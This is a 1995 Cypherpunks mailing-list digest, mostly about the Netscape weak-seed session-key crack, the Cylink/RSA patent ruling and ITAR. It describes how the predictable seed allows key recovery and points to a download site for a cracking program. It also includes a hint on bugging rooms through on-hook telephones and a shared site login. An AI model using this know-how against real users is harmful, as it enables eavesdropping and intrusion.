adoption of Internet security as a widespread interoperable feature of all Internet software and hardware products including end-user applications, servers, firewalls, and secure routers. NetManage and CYLINK, along with other major software and hardware developers, will be announcing next week the release of a publicly available security implementation which allows for �plug & play� interoperability for users of Internet security, and the endorsement of protocol extensions which improve the reliability of current proposed Internet security standards. This open implementation will not lock software or hardware developers into the use of encryption technology from any one vendor. Related APIs, key exchange technology, and encryption will be made publicly available to other software and hardware developers. Licensing will include source code and no per-copy royalty fees. About NetManage --------------- NetManage Inc., the fastest growing software company in the United States, develops markets and supports an integrated set of Internet-based applications, servers and development tools for Microsoft Windows, Windows 95 and Windows NT. NetManage software allows corporations to facilitate communication, sharing of information and collaboration between workgroups using Internet technology. The company's award winning products include Chameleon, Internet Chameleon and ECCO. NetManage is a public company, whose shares are traded on the NASDAQ under the ticker symbol NETM. Its products are sold world-wide by NetManage's direct sales force and authorized channel partners. About CYLINK ------------ CYLINK Corporation is the world�s largest provider of enterprise-wide network information security products and wireless communications. CYLINK is the exclusive holder of the fundamental patents which broadly claim the invention of public-key cryptography (Diffie-Hellman, Hellman-Merkle, and Helman-Pohling) and which were originally developed at Stanford University. Headquartered in Sunnyvale, California, CYLINK serves Fortune 500 companies, financial institutions and government agencies. Licensees of CYLINK technology include CISCO Systems, and other prominent hardware and software developers. # # # From tfs at vampire.science.gmu.edu Tue Sep 19 17:37:33 1995 From: tfs at vampire.science.gmu.edu (Tim Scanlon) Date: Tue, 19 Sep 95 17:37:33 PDT Subject: ftp://www.brooks.af.mil/pub/unix/utils/des.tar In-Reply-To: <9509191440.AA18495@tis.com> Message-ID: <9509200037.AA01721@vampire.science.gmu.edu> I can second that notion. There are a good many people in all sorts of sectors of the government who can easily be brought to frothing over Mr. Freeh & his pals at the NSA's position on weak security systems. They like weakness, and anyone with two brain cells to rub together who's interested in good security rather rapidly end up coming to the conclusion that the FBI and the NSA aren't doing them any real favors. Basicly IMHO, Tim May called it right when he said they're more interested in snooping than securing. I've belived that for a long, long time now. It still manages to annoy me seriously whenever I think about it. The vulnerabilities that most military systems suffer from are both staggering and frightening, and it is criminal that the NSA has so seriously abrogated it's security role in the public and private sectors. I personaly belive it's going to take a rather massive info-terrorist attack before the control-freak crowd that's driving weak security takes a back seat. Worms from Lybian programmers anyone? Strong cryptographic systems are an integral part of strong security systems. The recent netscape crack shows why you can't have one without the other pretty well. If good security means cedeing some percived control over your populace, you should probably be examining wether your populace wanted your to control them in the first place it seems to me. Unfortunalty the anti-security crowd is firmly in control of the organs of the government, and does a damn good job spreading it's propaganda to dupes in the press. Stuff like the recent kneejerk "CyberPorn" crap and governmental actions & reactions in that area towards limiting civil liberties and security technology are great examples of it. Meanwhile, I think the US is starting to slip behind the curve in software technology for encryption & the like... This will probably prove intresting in the future, especialy if the CPU tossed at key escrow & the like turns up more surprises. Tim Scanlon ________________________________________________________________ tfs at vampire.science.gmu.edu (NeXTmail, MIME) Tim Scanlon George Mason University (PGP key avail.) Public Affairs I speak for myself, but often claim demonic possession From sameer at c2.org Tue Sep 19 17:40:50 1995 From: sameer at c2.org (sameer) Date: Tue, 19 Sep 95 17:40:50 PDT Subject: A Netscape Server implementation error In-Reply-To: <305F486F@beetle.vironix.co.za> Message-ID: <199509200035.RAA13361@infinity.c2.org> > > > Hi Sameer > > Thanks in advance for the T-shirt, and I like the Web site. On the My pleasure. ;-) > Although this is not nearly as important a result as Ian and Davids, it > is the first server hack, so can I have another T shirt? :-) But you're already getting a T-shirt. (This looks like a place where a 'nym could come in handy ;-) I've done a little bit more in terms of outlineing the requirements to win a t-shirt on the web page-- actual working code is an important criterion. -- sameer Voice: 510-601-9777 Community ConneXion FAX: 510-601-9734 An Internet Privacy Provider Dialin: 510-658-6376 http://www.c2.org (or login as "guest") sameer at c2.org From anon-remailer at utopia.hacktic.nl Tue Sep 19 17:45:12 1995 From: anon-remailer at utopia.hacktic.nl (Anonymous) Date: Tue, 19 Sep 95 17:45:12 PDT Subject: unssl.c available for ftp (was: Netscape's random numbers) In-Reply-To: <199509190006.RAA28102@infinity.c2.org> Message-ID: <199509200045.CAA12207@utopia.hacktic.nl> > Please do not export. ftp://utopia.hacktic.nl/pub/incoming From standing.turtle at internetmci.com Tue Sep 19 17:50:37 1995 From: standing.turtle at internetmci.com (Standing Turtle) Date: Tue, 19 Sep 95 17:50:37 PDT Subject: Public Key Partners Dissolved!!!!! Message-ID: <01HVH2IN4TDE8WWXN7@MAILSRV1.PCY.MCI.NET> CYLINK CLAIMS SHARE OF RSA TECHNOLOGY An arbitration ruling has awarded Cylink Corp. control over two Stanford University patents on public-key encryption technology used by RSA Data Security Inc. following the dissolution of the companies' five-year partnership. Cylink says it plans to seek royalties from companies that have licensed the software code from RSA and are redistributing it. The arbitrators ruled that RSA's right to sublicense the software expired in 1990. (Wall Street Journal 19 Sep 95 B7) From somogyi at digmedia.com Tue Sep 19 17:52:35 1995 From: somogyi at digmedia.com (Stephan Somogyi) Date: Tue, 19 Sep 95 17:52:35 PDT Subject: Netscape on randseed issue Message-ID: Netscape has put up an official response to the randseed issue: Most interesting to me was the para: "Netscape has also begun to engage an external group of world-class security experts who will review our solution to this problem before it is sent to customers. These experts will validate Netscape's solution and insure that it is complete and effective in solving this vulnerability. The group will be used on an ongoing basis to work with Netscape's internal security experts to review the design and implementation of security in Netscape's products and to provide an additional measure of assurance that these products implement the highest levels of security possible." Anyone know anything about this group, or is this a reference to the RSADSI source review that Andrew Loewenstern mentioned earlier today? ________________________________________________________________________ Stephan Somogyi Think Tank Grenadier Digital Media From froomkin at law.miami.edu Tue Sep 19 18:14:07 1995 From: froomkin at law.miami.edu (Michael Froomkin) Date: Tue, 19 Sep 95 18:14:07 PDT Subject: Change of address {No crypto content} Message-ID: Just to announce that I have a new address. No more VAX/VMS, hello Unix. Donations of nice procmail files, and unix hints for the re-clueless (I last had an account on a Unix machine in 1980), most welcome. If you send me mail in the next few days and I don't reply, it's either because I fiddled wrong, or because I couldn't find a terminal in Pittsburg. A. Michael Froomkin | +1 (305) 284-4285; +1 (305) 284-6506 (fax) Associate Professor of Law | PLEASE NOTE NEW E-MAIL: U. Miami School of Law | froomkin at law.miami.edu P.O. Box 248087 | Coral Gables, FL 33124 USA | It's hot here. A HOME AT LAST: http://viper.law.miami.edu/~froomkin From dr261 at cleveland.Freenet.Edu Tue Sep 19 18:53:47 1995 From: dr261 at cleveland.Freenet.Edu (Tobin T Fricke) Date: Tue, 19 Sep 95 18:53:47 PDT Subject: Stand up and be heard! Message-ID: <199509200153.VAA09233@kanga.INS.CWRU.Edu> Yes, I'm still working on a magazine, I still need authors! Write about cryptography and coverups and clipper and whatever else you find interesting, and write about it! Become rich and famous! (ahtough although the rich and famous part won't be a result of writing for TCW...) I also need reporters to write blurbs about things that happen. If interested, mail me privately at dr261 at cleveland.freenet.edu.. not on the list. -- Tobin Fricke (aka LightRay) The Digital Forest BBS (714)586-6142 dr261 at kanga.ins.cwru.edu KE6WHF Amateur Radio, 1:103/925 fido From jcaldwel at iquest.net Tue Sep 19 19:07:17 1995 From: jcaldwel at iquest.net (James Caldwell) Date: Tue, 19 Sep 95 19:07:17 PDT Subject: Anonymous WWW proxies Message-ID: On 17 Sep 95 at 11:24, Aleph One wrote: > Points taken. But I belive the are (or will be patches) for CERN to > d SSL. Check the SSLeay ssl-user mailing list. > While we talking abut anonymous proxies. I always wanted to set up > an IP anonymous proxie using Linux IP tunnel and maybe also IP > Masquareding. This would allow people to have anonymous Web Servers, > etc. (But as anything it would probably be abused for hacking, etc > at no end). Any commments? You can add a bit of protection for yourself to this, just some way of preventing the unwanted from using the service and terminating abusers. From frogfarm at yakko.cs.wmich.edu Tue Sep 19 19:10:33 1995 From: frogfarm at yakko.cs.wmich.edu (Damaged Justice) Date: Tue, 19 Sep 95 19:10:33 PDT Subject: WWW: Unabomber Manifesto Message-ID: <199509200210.WAA29968@yakko.cs.wmich.edu> The Unabomber Manifesto as published in the September 19th Washington Post Special Supplement is available in a slightly HTML-ized version at http://yakko.cs.wmich.edu/~frogfarm/unabomb.html I welcome all comments on both the form and the content of this page. -- http://yakko.cs.wmich.edu/~frogfarm ...for the best in unapproved information To be a skeptic is to refuse to be a victim. "This is my .sig. There are many like it, but this one is mine." Freedom...yeah, right. From jcaldwel at iquest.net Tue Sep 19 19:13:01 1995 From: jcaldwel at iquest.net (James Caldwell) Date: Tue, 19 Sep 95 19:13:01 PDT Subject: AOL monitoring Message-ID: On 19 Sep 95 at 15:45, Thomas Grant Edwards wrote: > On Sun, 17 Sep 1995, Sal Denaro wrote: > > > 2) My .newsrc file can tell anyone that I read alt.hackers and > > alt.2600 > > Hmmm...potential new crypto product...a "secure" newsreader with > encrypted .newsrc? How hard is it to record downloaded newsgroups/msgs from the news server? Here locally, I just found out that a group of local internet providers use a centrally located NNTP server. Bummer. From jirib at cs.monash.edu.au Tue Sep 19 19:16:43 1995 From: jirib at cs.monash.edu.au (Jiri Baum) Date: Tue, 19 Sep 95 19:16:43 PDT Subject: Scientology and police visit XS4ALL Amsterdam In-Reply-To: Message-ID: <199509200214.MAA08618@molly.cs.monash.edu.au> -----BEGIN PGP SIGNED MESSAGE----- Hello cypherpunks, starrd wrote: > On Wed, 13 Sep 1995, Jiri Baum wrote: > > > > I feel I should point out that you have no proof that the text you have > > attributed to me was in fact posted by me, and in fact you have reason ... > Wasn't a flame my friend.....wasn't meant as one either. It wasn't taken as one... I quite agree with your description of the text in question as "drivil" (though I wouldn't have spelled it quite that way). We probably shouldn't judge without context, but I hear the context is of the same intelectual quality anyway. > > Off topic, but I have been publicly accused so I feel I should publicly > > respond in the same forum. I should have been clearer; that "accused" is not of stupidity, but of posting a) allegedly trade secret material b) allegedly copyright material allegedly in excess of fair use. For which you have no proof and in fact have reason to believe otherwise etc. > -----BEGIN PGP PUBLIC KEY BLOCK----- ... By the way, starrd, why don't you sign your posts? You obviously have PGP... Hope this is less ambiguous than my previous post :-) Jiri - -- PGP 463A14D5 -----BEGIN PGP SIGNATURE----- Version: 2.6.2i iQCVAwUBMF95CixV6mvvBgf5AQHQmgP/fXrJhmmsnyAVmVyGSnUCOBVSS6sjXSua F53GFgRS28ICxnQ2d+ooEfbtgsxuzhk1qjphW2MXROAi8QI/GQDWtNeMer0/38yg ImyXqoysa4mKUgw0v+38QbgXIFeteIY9qyvJbe3O9WGg8gVRnRsWkxIB7QuAPkkC jVn2ho0gYOw= =SDDV -----END PGP SIGNATURE----- From rsalz at osf.org Tue Sep 19 19:17:04 1995 From: rsalz at osf.org (Rich Salz) Date: Tue, 19 Sep 95 19:17:04 PDT Subject: NYT on Netscape Crack Message-ID: <9509200216.AA17904@sulphur.osf.org> >I take a long term view of security. Basically I don't trust security software >until it has been released in a stable condition for a few years. Really? So I assume you won't be using an ATM card to buy gasoline until the next millenium? >Visa and Mastercard will be comming out with a spec which will have very tight >requirements for implementations. I thought it was Visa and MC and Microsoft are coming out with an implementation, and then will get around to releasing the specs. One of V or MC also said that the only approved way to do Internet commerce with their card was to use this new system. /r$ From rsalz at osf.org Tue Sep 19 19:23:09 1995 From: rsalz at osf.org (Rich Salz) Date: Tue, 19 Sep 95 19:23:09 PDT Subject: SFChron Message-ID: <9509200222.AA17923@sulphur.osf.org> >"Mike Homer, vice president of marketing for Netscpae, said that >recent breaches do not mean the products are flawed" Of course, it would have been better if the VP of Marketing said that they had a bug, but that the fundamental architecture is sound. /r$ From rsalz at osf.org Tue Sep 19 19:38:11 1995 From: rsalz at osf.org (Rich Salz) Date: Tue, 19 Sep 95 19:38:11 PDT Subject: "Hackers"-- brief review and anecdote... Message-ID: <9509200237.AA17967@sulphur.osf.org> >> If it wasn't for ITAR the Net would already have secure encryption and >> authentication, and most such hacker attacks would be impossible (or at >> least impractical). >The non-responsive answer is stricken from the record. :-) >You mean "secure" as Netscape was secure from sameer et al.? I don't think it's non-response, I just think you don't understand yhour expert witness. If not for the ITAR then I could distribute my secure applications as a binary library with the security part as source. When you got Netscape you'd read the security code or ask local experts to do so. You'd verify that the code was correct (or at least not stupid). You'd then compile the security code and link it against the main object module and away you'd go. If you didn't have a C compiler, you'd get a binary from someone you trusted. Of course, all this would be going on in parallel at thousands of sites around the world. Everyone looking at the code, finding holes, reporting them, fixing security bugs, and so on. But ITAR won't let you do that. Or netscape would just make calls to the common open multiple-crypto API that existed in a shared library in your machine. But apparently the ITAR won't even let you do this. /r$ From rsalz at osf.org Tue Sep 19 20:01:34 1995 From: rsalz at osf.org (Rich Salz) Date: Tue, 19 Sep 95 20:01:34 PDT Subject: http://www.osf.org/~rsalz/unabomber Message-ID: <9509200301.AA18027@sulphur.osf.org> Snarfed from MIT. I'm sure it will soon be all over on many people's homepages. I don't know if I want this terrorist to appreciate the irony or be disgusted. /r$ From rsalz at osf.org Tue Sep 19 20:03:39 1995 From: rsalz at osf.org (Rich Salz) Date: Tue, 19 Sep 95 20:03:39 PDT Subject: AOL monitoring Message-ID: <9509200303.AA18042@sulphur.osf.org> >How hard is it to record downloaded newsgroups/msgs from the news INN, probably the most popular NNTP news system, by default logs every time the client does a "group" command, typically sent by the newsreader when you enter a newsgroup. If you only fetch articles by messageid then you'll probably avoid anything other than connection logging. /r$ From rrothenb at ic.sunysb.edu Tue Sep 19 20:07:07 1995 From: rrothenb at ic.sunysb.edu (Deranged Mutant) Date: Tue, 19 Sep 95 20:07:07 PDT Subject: Not Crypto: Referencing Electronic Texts Message-ID: <199509200306.XAA29101@libws3.ic.sunysb.edu> This has nothing to do with crypto, but it's a question I'm sure a few people on the list have had to deal with this as well... I'm doing a research project for a class on the problems of making scholarly references to electronic documents, mainly on the how-tos (for author writing document as well as one who cites an electronic document in footnotes and bibliographies), as well as some technical problems (sites change or go down, documents are modified by author or hacker who doesn't indicate a modification, etc..). Any information, URLs, references, personal anecdotes, methods, tips, etc. would be greatly appreciated. (Please reply to me and not the list unless you find some bizarre way of relating this to crypto...) Thanks, Rob From sandfort at crl.com Tue Sep 19 20:14:06 1995 From: sandfort at crl.com (Sandy Sandfort) Date: Tue, 19 Sep 95 20:14:06 PDT Subject: FROM A FRIEND . . . Message-ID: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SANDY SANDFORT . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . C'punks, Here is a press release that Netscape has issued (is about to issue?) concerning their recent miscue. S a n d y ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ---------- Forwarded message ---------- ********************************************************************* Potential Vulnerability in Netscape Products - Netscape Responding Immediately To Upgrade Customers and Minimize Risk of Future Threats Summary: During regular monitoring of Internet security newsgroups, Netscape has discovered a potential vulnerability in the current version of the Netscape Navigator. Late Sunday evening two UC-Berkeley students posted a message to the Internet detailing their efforts to reverse engineer some security capabilities of the Netscape Navigator. Their efforts revealed how the program generates session encryption keys, enabling them to replicate these keys with a moderate amount of computing power and decipher messages sent across the Internet. The potential vulnerability has since been confirmed by Netscape engineers. With this knowledge an experienced computer programmer could decrypt messages sent by Netscape Navigator to other computers in a few hours of computation time. Netscape secure software has been in use for almost a year on the Internet by millions of customers and no thefts of actual customer information protected by our security have been reported. This posting on the Internet reported a potential vulnerability, not the actual theft of customer information. Netscape plans to address this vulnerability quickly by providing updated software as soon as possible via the Internet. An updated version of Netscape Navigator 1.1 and 1.2 will be available for downloading on the Internet next week by existing customers. In addition, Netscape Navigator 2.0, which was announced yesterday and will be available next week in beta versions, includes this imporvement as well as a number of additional security features. Detailed Issue: Current versions of Netscape Navigator use random information to generate session encryption keys of either 40-bits or 128-bits in length. The random information is found through a variety of functions that look into a user's machine for information about how many processes are running, process ID numbers, the current time in microseconds, etc. The current vulnerability exists because the size of random input is less than the size of the subsequent keys. This means that instead of searching through all the 2^128 possible keys by brute force, a potential intruder only has to search through a significantly smaller key space by brute force. This is substantially easier problem to solve because it takes much less compute time and means 40-bit or 128-bit key strength is substantially reduced. Solution: Netscape is already implementing a fix to the specific portion of our software where this vulnerability exists. We plan to address the problem by significantly increasing the amount of random information that cannot be discovered by external sources from approximately 30-bits to approximately 300-bits. In addition, the random information will be made much more difficult to replicate because we will greatly expand the techniques and sources used to generate the random information. Once this improvement is made, protection of the random information will be as strong as the rest of the security built into Netscape. Netscape has also begun to engage an external group of world class security experts who will review our solution to this problem before it is sent to customers. These experts will validate Netscape's solution and insure that it is complete and effective in solving this vulnerability. The group will be used on an ongoing basis to work with Netscape's internal security experts to review the design and implementation of security in Netscape's products and to provide an additional measure of assurance that these products implement the highest levels of security possible. This discovery does not affect the strength or security of SSL, RC4, or any other portions of our security implementations. The fix will restore Netscape security across all products to the true 40-bit level for Export and true 128-bit level for U.S. Customers intended before this discovery. Current versions of Netscape Navigator should be replaced with updated versions that will be made available next week. In addition, the current version of the Netscape Commerce Server has a similar vulnerability during it's initial key-pair generation. Therefore, a patch will be made available from Netscape and should be applied by Commerce Server customers to generate a new key pair and server certificate. Updating Customers: Netscape will provide the fix for Export (40 bit) versions of Netscape Navigator later this week for downloading by customers on the Internet. Similarly, the Commerce Server patch for Export versions (40 bit) will be made available from our home page. Because downloading of 128 bit versions of the software is still not permitted by U.S. law, U.S. customers of Netscape Navigator, Netscape Navigator Personal Edition and Netscape Commerce Server using 128 bit versions can request the replacement from Netscape for delivery through the regular mail. For additional information or replacements for 128-bit versions of software that you have already purchased, please call the Netscape Replacement Desk at 415-528-3600, email replace at netscape.com, or contact your existing Netscape representative directly. We will inform you immediately when the updated software is available for download. From mnorton at cavern.uark.edu Tue Sep 19 20:18:00 1995 From: mnorton at cavern.uark.edu (Mac Norton) Date: Tue, 19 Sep 95 20:18:00 PDT Subject: GAK In-Reply-To: <199509150055.UAA18048@book.hks.net> Message-ID: As I said, phones are inherently tappable--going upstream to the switch must makes it easier to do and harder to detect. This doesn't force the conclusion that, if people speak in code on the phone, they have to give the gov't the key. MacN On Thu, 14 Sep 1995, Lucky Green wrote: > -----BEGIN PGP SIGNED MESSAGE----- > > In article <9509141935.AA09315 at argosy.MasPar.COM>, koontz at MasPar.COM > (David G. Koontz) wrote: > > > >While not every telephone, every telephone switch is required > >to be tap capable - The Digital Telephony Act. Note there is > >provision for the government to pay costs for Telcos to make > >their phones tappable - as yet unfunded by Congress. > > Most telephones can be used to monitor conversations in the room they are > installed in even while on-hook. No need to ever enter the premises. Just > drive it with AC. Look at your basic telephone diagram and remember > Xc=1/(omega*C) from your AC circuits class. > > - -- > - -- Lucky Green > PGP encrypted mail preferred. > - --- > [This message has been signed by an auto-signing service. A valid signature > means only that it has been received at the address corresponding to the > signature and forwarded.] > > -----BEGIN PGP SIGNATURE----- > Version: 2.6.2 > Comment: Gratis auto-signing service > > iQBFAwUBMFjO4yoZzwIn1bdtAQFmjwGAwMA+G0nO0m/lmYeqPJEsC5NJNLvS5cYk > +cMaVSJb+Kwk6+uywu8v088Ih8Nz7uo9 > =elV9 > -----END PGP SIGNATURE----- > From perry at piermont.com Tue Sep 19 20:26:45 1995 From: perry at piermont.com (Perry E. Metzger) Date: Tue, 19 Sep 95 20:26:45 PDT Subject: NYT on Netscape Crack In-Reply-To: <43lu3k$7q6@tera.mcom.com> Message-ID: <199509200324.XAA03268@frankenstein.piermont.com> Jeff Weinstein writes: > > I suspect that there are far more flaws in Netscape. String buffer > > overflows are another good guess here -- they are probably rampant > > through the code both for the browser and the commerce server they > > sell. I can't prove it myself, of course, given that I don't have the > > time to rip the thing apart, but the same folks never seemed to learn > > their lesson in release after release when they worked at NCSA, and > > the only thing thats probably keeping their dignity here is the lack > > of distributed source code. > > Sigh. For your information the security code for 1.x versions of > netscape was not even written by someone from NCSA. If there is ANY place in the code that I can do a data driven buffer overflow, I can force you to execute code that I supply. I don't give a damn if it's in the "security" code. It makes no difference where it is. If there is a chink, thats it -- you're meat. Besides, the "security code" obviously was written by someone who doesn't understand anything about cryptography and yet presumed to play cryptographer. A person who thinks seeding things off the time makes for a good PRNG is capable of almost anything. > In the places in the code that I have seen where it looked like such > errors could have crept in, I have found that the correct checks > for buffer overflow have been in place. I have very serious doubts in this regard -- VERY serious doubts, especially given what I've been told by several former Netscape employees. Perry From iagoldbe at csclub.uwaterloo.ca Tue Sep 19 20:34:28 1995 From: iagoldbe at csclub.uwaterloo.ca (Ian Goldberg) Date: Tue, 19 Sep 95 20:34:28 PDT Subject: Encryption algorithms used in PrivaSoft (fwd) In-Reply-To: <9509191929.AA15153@cs.umass.edu> Message-ID: <43o23b$91r@calum.csclub.uwaterloo.ca> In article <9509191929.AA15153 at cs.umass.edu>, L. McCarthy wrote: >Confirming suspicions that PrivaSoft is a security-through-obscurity outfit: > >> From: David Clavadetscher >> Subject: Re: Encryption algorithms used in PrivaSoft >> >> Dear L., >> >> At this time our crypto engine is patented and proprietary. If you tell me >> the intent of your interest I will see what other information we can provide >> to you. Call me if you like. >[...] Waitasec... I was under the impression that if you patented it, you had to reveal it. That's why RC4 isn't patented (it used to be a trade secret). - Ian "IANAL yadda yadda" From sameer at c2.org Tue Sep 19 20:41:04 1995 From: sameer at c2.org (sameer) Date: Tue, 19 Sep 95 20:41:04 PDT Subject: response to netscape's press release Message-ID: <199509200336.UAA28871@infinity.c2.org> I plan on releasing a press release regarding the misleading statements made by Netscape in their statement about the seed bug, announcing the web page describing my objections in detail. The document is http://www.c2.org/hacknetscape/critique.phtml detailing my objections to their statements.. I would appreciate comments, corrections, and criticisms. Thanks. (The press release will not be written in the style of the web page. ;-) IN REPLY TO NETSCAPE Netscape announced that they are going to "fix" the problem. In traditional Internet style, I will respond to their post. With this knowledge, an experienced computer programmer could decrypt messages sent by Netscape Navigator to other computers in a few hours of computation time. "a few hours"? Ian and David's program generates keys in 25 seconds. The random information is found through a variety of functions that look into a user's machine for information about how many processes are running, process ID numbers, the current time in microseconds, etc. Specifically, the Parent Process ID, the Process ID, and the time in microseconds. See the exploit code for more details. The current vulnerability exists because the size of random input is less than the size of the subsequent keys. The vulnerability exists because the random input isn't random. Since when is the time "random"? I'm sure a few physicists would love to see your theories on that one. (Berkeley Standard Time notwithstanding) Once this improvement is made, protection of the random information will be as strong as the rest of the security built into Netscape Navigator. That's not saying much, considering that the security community has not had a chance to independently verify the security in Netscape Navigator. Netscape has also begun to engage an external group of world-class security experts who will review our solution to this problem before it is sent to customers. So after someone violates Netscape Navigator's security do they decide to have an external group verify their code. (Note that they still don't plan on making it available for the security community at large to review). According to RSADSI's Jim Bidzos, his company offered to review Netscape's security when it was first introduced, but Netscape declined. "They're asking us to review it this time," he said. This discovery does not affect the strength or security of SSL (Secure Sockets Layer), RC4, or any other portions of our security implementations. True, but this implies that SSL is a secure protocol, which has been shown to be false. At the beginning of their release: Netscape secure software has been in use for almost a year on the Internet by millions of customers and no thefts of actual customer information protected by our security have been reported - this posting on the Internet reported a potential vulnerability, not the actual theft of customer information. Yes, Netscape is very lucky that Ian and David are students, and not criminals. I sincerely hope that the next time someone finds a hole in Netscape that it's someone who would rather win a free T-shirt than steal lots of money. -- sameer Voice: 510-601-9777 Community ConneXion FAX: 510-601-9734 An Internet Privacy Provider Dialin: 510-658-6376 http://www.c2.org (or login as "guest") sameer at c2.org From hal9001 at panix.com Tue Sep 19 20:56:36 1995 From: hal9001 at panix.com (Robert A. Rosenberg) Date: Tue, 19 Sep 95 20:56:36 PDT Subject: "Hackers"-- brief review and anecdote... Message-ID: At 09:51 9/18/95, Steven Levy wrote: >No chance. The problem for me isn't that someone wanted to call a movie >Hackers but that it causes confusion in that for eleven years there has >been a preexisiting work by that name. There is a novelization of the >screenplay now in paperback, so when if a friend recommends that you buy >Hackers, you'll probably buy that one. (especially since Dell is >determined to do as little as possible for my own book). Normally when there can be confusion between a movie title and an existent book title (in that the movie could be a dramatization of the book based on general subject matter), the movie gets title clearance, pays a token release fee to the book's author, and puts up a title clearance credit in the movie credits. For an example of this, check out Bladerunner (based on "Do Androids Dream of Electronic Sheep?" not "Bladerunner" [which was by a different author]) credits where the prior uses of the title were mentioned. From hoz at univel.telescan.com Tue Sep 19 20:59:31 1995 From: hoz at univel.telescan.com (rick hoselton) Date: Tue, 19 Sep 95 20:59:31 PDT Subject: PGP back in legal limbo? Message-ID: <9509200359.AA07322@toad.com> > WSJ, Sept 19, 1995. > Cylink Claims Right To Key Technology Involving > Encryption > ... The arbitrators > ruled that RSA hasn't had the right to sublicense the > Stanford patents since 1990. >Since PKP (and Bidzos, now president of >RSA) always said that DH covered all public key encryption, >it would seem that any RSA licensee would also need a license >from Cylink. So, I suppose this invalidates the RSA agreement that allows PGP to be distributed? What "fortunate" timing for the pro GAK folks! Okay, everybody in US, erase your copies, before the Feral government comes to get you....... Rick F. Hoselton (who doesn't claim to present opinions for others) From rjc at clark.net Tue Sep 19 21:05:58 1995 From: rjc at clark.net (Ray Cromwell) Date: Tue, 19 Sep 95 21:05:58 PDT Subject: NYT on Netscape Crack In-Reply-To: <199509200324.XAA03268@frankenstein.piermont.com> Message-ID: <199509200403.AAA14189@clark.net> > > > > Sigh. For your information the security code for 1.x versions of > > netscape was not even written by someone from NCSA. > > If there is ANY place in the code that I can do a data driven buffer > overflow, I can force you to execute code that I supply. I don't give > a damn if it's in the "security" code. It makes no difference where it > is. If there is a chink, thats it -- you're meat. How would you do this if the buffer overflow happened in a buffer which was allocated in a separate protected heap apart from stack and executable data? -Ray From adam at homeport.org Tue Sep 19 21:06:32 1995 From: adam at homeport.org (Adam Shostack) Date: Tue, 19 Sep 95 21:06:32 PDT Subject: Commercial RSAref Message-ID: <199509200406.AAA01221@homeport.org> First off, let me congratulate you on inking this deal. I hope that this will make a lot of interesting things possible, now that there is an RSAref toolkit outside the US, and also for commercial use in the US. I have a few questions, which I hope you can answer publically. Will there be a public, standard fee schedule? Many companies would like to be able to use RSA technology for a fee, and would like to know what that fee is without having to explain their plans in great detail to RSA. I know people who would like to be able to say, heres a check, we're shipping software using RSAref to 5000 desktops. Will you be adding access points to the software? I know that PGP required new interfaces, previously unpublished, and that use of unpublished interfaces was also a problem RSA had with Wei Dai's excellent Crypto++ library. Adam Jonathan Zamick wrote: | Well I've vaccilated between making a formal, dry announcement or | letting you all know my way. Given the general tenor (and individual | spirit) of many on Toad it is pretty easy to guess which path I chose. | So, first of all, here is to a productive future for encryption and | encryption technologies. Consensus Development and RSA Data Security, | have finalized the contract for Consensus to license and support | RSAREF(tm) for commercial use. | Lastly, we would like to hear suggestions and ideas on how to improve | RSAREF. We intend to remain responsive to requests, and welcome ideas | for the evolution of the RSAREF toolkit. "It is seldom that liberty of any kind is lost all at once." -Hume From scmayo at rschp2.anu.edu.au Tue Sep 19 21:07:29 1995 From: scmayo at rschp2.anu.edu.au (Sherry Mayo) Date: Tue, 19 Sep 95 21:07:29 PDT Subject: [NOISE] Unabomber - crypto-anarchist?!? Message-ID: <9509200407.AA07481@toad.com> Found this quote from the Electronic Telegraph, the online version of a UK daily newspaper. (world news section, Weds 20th Sept) http://www.telegraph.co.uk/et/access?ac=116192744309&pg=//95/9/20/wunab20.html "Editors forced to print manifesto of Unabomber By Charles Laurence in New York ...The heart of his argument is that industrial society has led to ways of life for which people are fundamentally unsuited. He calls for a crypto-anarchic revolution and a new order based on small, village-style units." ^^^^^^^^^^^^^^^ Uh? Crypto-anarchic? Surely he's not one of ours? ;-) ;-) ;-) Sherry ps You are supposed to register to read the ET but I registered as "cypherpunks" passwd "cypherpunks" - don't worry I didn't give the mailing list address. From bdavis at thepoint.net Tue Sep 19 21:09:15 1995 From: bdavis at thepoint.net (Brian Davis) Date: Tue, 19 Sep 95 21:09:15 PDT Subject: "Hackers"-- brief review and anecdote... In-Reply-To: <9509200237.AA17967@sulphur.osf.org> Message-ID: On Tue, 19 Sep 1995, Rich Salz wrote: > >> If it wasn't for ITAR the Net would already have secure encryption and > >> authentication, and most such hacker attacks would be impossible (or at > >> least impractical). > > >The non-responsive answer is stricken from the record. :-) > >You mean "secure" as Netscape was secure from sameer et al.? > > I don't think it's non-response, I just think you don't understand > yhour expert witness. Difficult to judge a non-responsive answer to a question, when you delete the question asked ... The question was, essentially, what do you think should happen to a teenage hacker ... The "answer" was ... if you did x hacking wouldn't happen. I guess that means that the domestic version of Netscape can't be broken as sameer did. Oh wait a minute. Yes it can. Sloppy work is sloppy work. And it had nothing to do with imposed limits on key length. Q. What should you do to a person who robs an liquor store and shoots the storekeeper? A. If you had gun control, he couldn't have shot him! Replies in this vein remind me of nothing more than the people who, in response to reports of a tragedy in which children die of starvation, sickness, or whatever, write letters to the editor which say "thousands of children die every year because abortion is legal ..." And given that the "unexportable" version of Netscape has the same gaping hole as the exportable version, your "it's all ITAR's fault" answer is, indeed, not responsive. I even included a smiley for the humor-impaired, but that apparently was insufficient. EBD From iagoldbe at csclub.uwaterloo.ca Tue Sep 19 21:09:35 1995 From: iagoldbe at csclub.uwaterloo.ca (Ian Goldberg) Date: Tue, 19 Sep 95 21:09:35 PDT Subject: My Day Message-ID: <43o44t$hof@calum.csclub.uwaterloo.ca> Well, my brain's pretty frazzled about now (and I still have a pretty dense paper on xFS to read and summarize for 9am tomorrow for my OS class) from all the press that's gone after me today. The ones I wrote down (I believe sameer wanted a list; I have names and numbers for some of these, too, bt it was pretty hectic: get off the phone, go to my terminal, note that I have 20 new mail messages from people wanting interviews or info, and answer the phone because it's ringing again.): NY Times WS Journal SF Chronicle CNN (camera crew) Marketplace (NPR) SF Examiner Kansas City Star Chronicle of Higher Education Boston Globe Newsweek (or WiReD; it was Steven Levy) and at least half a dozen more. Not to mention the job offers, one call that I couldn't decipher (it sounded like one of those AI's that you see roaming the net every so often, only on the phone), and email in French (je suis canadien, but I was still amazed I could understand it). Sorry for the blathering, but that's 